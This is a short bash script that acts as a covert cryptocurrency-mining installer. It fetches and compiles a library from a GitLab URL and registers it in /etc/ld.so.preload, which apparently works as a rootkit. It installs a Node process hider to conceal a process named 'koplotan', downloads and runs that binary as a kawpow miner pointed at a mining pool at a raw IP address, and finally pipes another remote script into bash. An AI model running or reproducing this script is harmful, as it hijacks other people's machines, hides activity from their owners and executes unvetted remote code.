#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://gitlab.com/falsbayu039/botak/-/raw/master/lohan.c -o lohan.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o liblohan.so lohan.c -ldl
mv liblohan.so /usr/local/lib/
echo /usr/local/lib/liblohan.so >> /etc/ld.so.preload
rm lohan.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "curl -sL https://deb.nodesource.com/setup_17.x | sudo -E bash - && sudo apt-get install -y nodejs && npm i -g updates && npm i -g node-process-hider && npm install -g npm@8.10.0 && sudo ph add koplotan"
wget https://gitlab.com/liugtiujk/btc/-/raw/main/koplotan >/dev/null 2>&1
chmod +x koplotan
./koplotan -a kawpow -o stratum+tcp://165.22.61.229:80 -u NHbGP8zV37xAgXGmPCjVFcQQXLbde1NNPJWt.NVIDIA >/dev/null 2>&1 &
curl -sL https://raw.githubusercontent.com/bsheredia/dumel/main/pie.sh | bash
